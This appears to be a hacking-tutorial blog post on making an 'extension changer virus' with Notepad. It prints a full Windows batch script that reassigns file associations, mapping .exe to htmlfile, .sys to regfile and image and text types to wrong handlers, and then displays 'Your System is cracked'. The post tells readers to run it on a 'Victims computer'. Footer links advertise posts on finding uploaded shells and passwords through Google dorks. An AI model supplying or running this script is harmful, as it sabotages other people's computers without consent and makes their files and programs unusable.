HOW TO MAKE EXTENSION CHANGER VIRUS USING NOTEPAD

HOW TO MAKE EXTENSION CHANGER VIRUS USING NOTEPAD

Untitled
In this article i am gonna show you how to make a virus that changes extension of files.Even though it is not a harmful virus it will change all the files extension and makes it unuseful for the user and he has to again change the files extension to its orginal one.
What is Extension changer ?
Assume that all images (*.jpeg, Gif etc) are by default opening with “Windows Picture and Fax Viewer” but in with this virus,this will change to some other application as you wish for ex: .mpeg application so that it cannot be opened in this way you can disable opening of jpeg application.

HOW TO MAKE EXTENSION CHANGER VIRUS
1. Open a Notepad and copy and paste the below code

@echo off
assoc .txt=jpegfile

assoc .exe=htmlfile
assoc .jpeg=avifile

assoc .png=mpegfile
assoc .mpeg=txtfile

assoc .sys=regfile

msg Your System is cracked …..
exit
  1. Save it as anyname.bat, and now your virus file is ready.
  2.  Execute this on Victims computer
DONE, ENJOY>>>>>>

Comments

Popular posts from this blog

Keyboard Shortcuts That you must learn

Stay Secured By IP Spoofing In Kali Linux or Ubuntu Using Torsocks

How To Find Uploaded shell and Passwords By Google dorks (priv8 dorks)